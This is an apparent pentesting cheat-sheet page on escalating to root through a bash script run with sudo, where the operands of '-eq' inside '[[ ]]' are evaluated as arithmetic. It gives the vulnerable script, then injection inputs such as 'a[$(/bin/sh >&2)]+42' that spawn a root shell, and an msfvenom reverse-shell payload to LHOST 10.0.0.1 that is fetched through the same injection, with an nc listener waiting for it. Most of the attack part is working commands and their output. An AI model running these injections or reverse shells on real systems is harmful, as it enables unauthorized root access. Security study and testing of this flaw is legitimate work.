
Bash eq Privilege Escalation

The `-eq` comparison in a bash script is vulnerable to arbitrary command execution.


Last updated 1 year ago

Investigation

Please see this post for details.

sudo -l

(root) /bin/bash /opt/example.sh
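
If we can execute the above command as root, and `/opt/example.sh` contains a numeric comparison such as `[[ $var -eq 42 ]]`, we can execute arbitrary commands. Inside `[[ ]]`, bash evaluates the operands of `-eq` as arithmetic expressions, so an array subscript that contains a command substitution is executed.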

#!/bin/bash

read -rp "Enter guess: " num

if [[ $num -eq 42 ]]
then
  echo "Correct"
else
  echo "Wrong"
fi

To execute an arbitrary command, answer the prompt as shown below.

sudo /bin/bash /opt/example.sh
Enter guess: a[$(date >&2)]+42
Sun Feb  4 19:06:19 PST 2018
Correct

The arbitrary command is injected before the correct number (42).

Exploitation (Get a Shell Directly)

It’s easy if we can execute the bash script as root. We only need to insert the /bin/sh or /bin/bash command in the answer.

sudo /bin/bash /opt/example.sh
Enter guess: a[$(/bin/sh >&2)]+42
$

Exploitation (Get a Shell Indirectly)

We can also inject a bash script and execute arbitrary code. First, create a reverse shell script /tmp/shell.elf using msfvenom.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o /tmp/shell.elf
chmod +x /tmp/shell.elf

Then start a listener on the local machine.

nc -lvnp 4444

Now execute the bash script as root.

sudo /bin/bash /opt/example.sh
Enter guess: a[$(/tmp/shell.elf)]+42

We should get a root shell in the local terminal.

References

https://www.vidarholen.net/contents/blog/?p=716